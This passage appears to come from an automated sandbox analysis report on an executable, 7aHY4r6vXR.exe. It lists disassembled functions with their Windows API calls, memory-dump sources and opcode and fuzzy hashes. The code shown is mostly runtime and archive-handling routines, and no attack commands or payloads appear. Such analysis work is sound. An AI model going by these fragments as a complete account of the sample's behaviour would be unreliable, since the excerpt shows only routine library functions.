                                                            • Opcode ID: 0cd5bd95087a2f2045eee521789e6b2d2c3c795bc4230fb6fca92986d81afa83
                                                            • Instruction ID: c1fe4a2d87b12ed828704758d60d5b0191bbf8b2675900dc116efbeae878d96f
                                                            • Opcode Fuzzy Hash: 0cd5bd95087a2f2045eee521789e6b2d2c3c795bc4230fb6fca92986d81afa83
                                                            • Instruction Fuzzy Hash: F3E08670A15782AEC7209F75984DB15BBDCAF04714F15887FF0DA93680D7B4D580CB50
                                                            Function 00BF2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 223c6665919ee1deeb5bfb23a2aeb1449b20bbdb1a32918f042af76ecb7d7644
                                                            • Instruction ID: ba09c7c3ea4131675257b9c1d0859d8a7477d0a2c296da0e08b5a24a53923c8c
                                                            • Opcode Fuzzy Hash: 223c6665919ee1deeb5bfb23a2aeb1449b20bbdb1a32918f042af76ecb7d7644
                                                            • Instruction Fuzzy Hash: C651047660121EAFEB289F18D885BBA77E4FF54310F2441ADEE01476A1D731ED48DB90
                                                            Function 00BFBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00BFBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BFBF5C
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BFBF82
                                                            • _free.LIBCMT ref: 00BFBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BFBFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 3453d4f5442d92c2eb73327f6fc1cb9185afeef199e43903e43925efdfbbcb31
                                                            • Instruction ID: 346b9a27844310ed46b93565677c74f159e0fd7e074147ddb38dd78d9260d5a9
                                                            • Opcode Fuzzy Hash: 3453d4f5442d92c2eb73327f6fc1cb9185afeef199e43903e43925efdfbbcb31
                                                            • Instruction Fuzzy Hash: 2901F7726016197F6321167A9C9CD7F6AADDEC6FA031501A9FB04C3100EF60CD05C5B0
                                                            Function 00BF9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00BF91AD,00BFB188,?,00BF9813,00000001,00000364,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF986E
                                                            • _free.LIBCMT ref: 00BF98A3
                                                            • _free.LIBCMT ref: 00BF98CA
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF98D7
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF98E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: a2bbecee64cb6cac7a851cc6e7ddebc22b06cd04d72b2b653459de9b17a9c379
                                                            • Instruction ID: f8c7127a86659d40b618f4222b4c32af578ad4b92b02d026e098ccb5b3804116
                                                            • Opcode Fuzzy Hash: a2bbecee64cb6cac7a851cc6e7ddebc22b06cd04d72b2b653459de9b17a9c379
                                                            • Instruction Fuzzy Hash: AD01D13614560D6BC3162669AC85B3F25EDDFD37F4B2201B9F705A3192EE348D0D9121
                                                            Function 00BE0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BE11CF: ResetEvent.KERNEL32(?), ref: 00BE11E1
                                                              • Part of subcall function 00BE11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BE11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BE0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00BE0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00BE0F54
                                                            • CloseHandle.KERNEL32(?), ref: 00BE0F60
                                                            • CloseHandle.KERNEL32(?), ref: 00BE0F6C
                                                              • Part of subcall function 00BE0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
                                                              • Part of subcall function 00BE0FE4: GetLastError.KERNEL32(?), ref: 00BE0FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 15ca15d0c16aa781671122f88892e1f59d9a3e18e03b8f8ffabca12c3238b39c
                                                            • Instruction ID: 4021b7b52b0f548ceaa448df559cf1674737ad27497338d8be0c0efd4c72cca8
                                                            • Opcode Fuzzy Hash: 15ca15d0c16aa781671122f88892e1f59d9a3e18e03b8f8ffabca12c3238b39c
                                                            • Instruction Fuzzy Hash: 11017571101784EFC7229B65DC84BCAFBEDFB08B14F004969F15B52160C7B57A55CB90
                                                            Function 00BFC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BFC817
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFC829
                                                            • _free.LIBCMT ref: 00BFC83B
                                                            • _free.LIBCMT ref: 00BFC84D
                                                            • _free.LIBCMT ref: 00BFC85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 5e9d4d745941b5ed5524f83dd93699aacf5a1d407539c95b5abca974fbfdf942
                                                            • Instruction ID: 0e4d09389bcecd991ebf60ea156b3900a0f99547a821b64e3146befdd03abbbf
                                                            • Opcode Fuzzy Hash: 5e9d4d745941b5ed5524f83dd93699aacf5a1d407539c95b5abca974fbfdf942
                                                            • Instruction Fuzzy Hash: E4F0623250421CABC720DB68E585E3A7BE9EE017907591CADF318D7592CB70FCC4CA50
                                                            Function 00BE1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BE1FE5
                                                            • _wcslen.LIBCMT ref: 00BE1FF6
                                                            • _wcslen.LIBCMT ref: 00BE2006
                                                            • _wcslen.LIBCMT ref: 00BE2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BDB371,?,?,00000000,?,?,?), ref: 00BE202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: e876839893e79035377908bfc8e9b92d693165d3779d87c594a50af271c5eab7
                                                            • Instruction ID: 02eb22746f2b0311eaaacef92945591566edad16b5dd83aed9e6e114820ef7a0
                                                            • Opcode Fuzzy Hash: e876839893e79035377908bfc8e9b92d693165d3779d87c594a50af271c5eab7
                                                            • Instruction Fuzzy Hash: 53F09032008058BFCF262F51EC09DDE3FAAEF50B70B118485F61A5B0A2CB72D665D6E0
                                                            Function 00BF8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF891E
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BF8930
                                                            • _free.LIBCMT ref: 00BF8943
                                                            • _free.LIBCMT ref: 00BF8954
                                                            • _free.LIBCMT ref: 00BF8965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: ac0305dee7d045d656b7115bd4d89bff7d0dc1134b2713e8ce380fe76965df63
                                                            • Instruction ID: af61847f82c087960bd83bd5bbd206ada8e24545a29640fcd5076bcb42991edd
                                                            • Opcode Fuzzy Hash: ac0305dee7d045d656b7115bd4d89bff7d0dc1134b2713e8ce380fe76965df63
                                                            • Instruction Fuzzy Hash: 18F0DA7582062A9BCF466F14FC0372E3BF1FF25764301199AF614572B1CB724945DB81
                                                            Function 00BE15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 3f85889bd68031cc863110f99ff775f5d68209d95e31bde3da0933263565704a
                                                            • Instruction ID: 232eab142c0ffa4fe5c56e48762a677c4331f87989cf5c6c1a6dcc7043415e22
                                                            • Opcode Fuzzy Hash: 3f85889bd68031cc863110f99ff775f5d68209d95e31bde3da0933263565704a
                                                            • Instruction Fuzzy Hash: FA51E0752483C0FAE6211A9E8DC6F3572D5AB15F04F344EC7F396644D1DBB2E810A72A
                                                            Function 00BF7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\7aHY4r6vXR.exe,00000104), ref: 00BF7FAE
                                                            • _free.LIBCMT ref: 00BF8079
                                                            • _free.LIBCMT ref: 00BF8083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\7aHY4r6vXR.exe
                                                            • API String ID: 2506810119-821618498
                                                            • Opcode ID: a75f2e1738e2e818a935998d3b483a5041505663d0a7f70c3deca14d0183e1fe
                                                            • Instruction ID: 5efac321640453d47b7899243393208f76d6e0d26cbe37b16ee6cf3a916f6750
                                                            • Opcode Fuzzy Hash: a75f2e1738e2e818a935998d3b483a5041505663d0a7f70c3deca14d0183e1fe
                                                            • Instruction Fuzzy Hash: 8E318F71A0021DAFDB21DFA9DC85EAEBBF8EF95310F5040EAF60497211DA718A48CB51
                                                            Function 00BF31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BF31FB
                                                            • _abort.LIBCMT ref: 00BF3306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 3e173be45b90aeff97f5c03ba10397a2e81d3965fe481ef8d5882fd25128aa00
                                                            • Instruction ID: 2eef9a17145b3190bad49f6499d8f28f1f5f77c1b1f4ce803645006019407194
                                                            • Opcode Fuzzy Hash: 3e173be45b90aeff97f5c03ba10397a2e81d3965fe481ef8d5882fd25128aa00
                                                            • Instruction Fuzzy Hash: 0241467190020DAFCF15DF98CD81AAEBBF5FF48704F188099FA04A7222D335AA94DB54
                                                            Function 00BD7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD7406
                                                              • Part of subcall function 00BD3BBA: __EH_prolog.LIBCMT ref: 00BD3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00BD74CD
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: 4bb8ececa5d9bfb9c10fc78203154a2e4c9e388c3f1c98fd4179b908e58d3eef
                                                            • Instruction ID: 263839756c21dc62819c8f1f52a3ef457055c371ad8d16f5628e30d5d12ba65e
                                                            • Opcode Fuzzy Hash: 4bb8ececa5d9bfb9c10fc78203154a2e4c9e388c3f1c98fd4179b908e58d3eef
                                                            • Instruction Fuzzy Hash: 6B319371D44248AADF11EBA49C45BEEBBE9EF59304F0440A7F905A7381FB748A44CB61
                                                            Function 00BEAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BEAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BEADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BEADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: ee1c13991e3a9f8ac90f901bbe501a5f381b0155cab47bf886a254df23a242e0
                                                            • Instruction ID: f245846b321a6fd2112003149c9407d54b544ade0c197b61580085837f2a299e
                                                            • Opcode Fuzzy Hash: ee1c13991e3a9f8ac90f901bbe501a5f381b0155cab47bf886a254df23a242e0
                                                            • Instruction Fuzzy Hash: 2D11D332340240BFD3119F69EC45F6E7BEDEF4A702F0484A1F641DB5A0CB61AA159722
                                                            Function 00BDD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 00BDD954
                                                            • _strncpy.LIBCMT ref: 00BDD99A
                                                              • Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: c2bf149ad8a0e262592372c2750a40564a64b0dfd695ce200f417f27cfd458f8
                                                            • Instruction ID: 804490b269d22b3192096bf22ab6f2e1eccafd802435aa78eb79d73d41881100
                                                            • Opcode Fuzzy Hash: c2bf149ad8a0e262592372c2750a40564a64b0dfd695ce200f417f27cfd458f8
                                                            • Instruction Fuzzy Hash: A321637254024CAADB21EFA4CC45FEEBBE8EF05704F0445A3F990962A2F376D648DB51
                                                            Function 00BE0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BDAC5A,00000008,?,00000000,?,00BDD22D,?,00000000), ref: 00BE0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 00BE0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
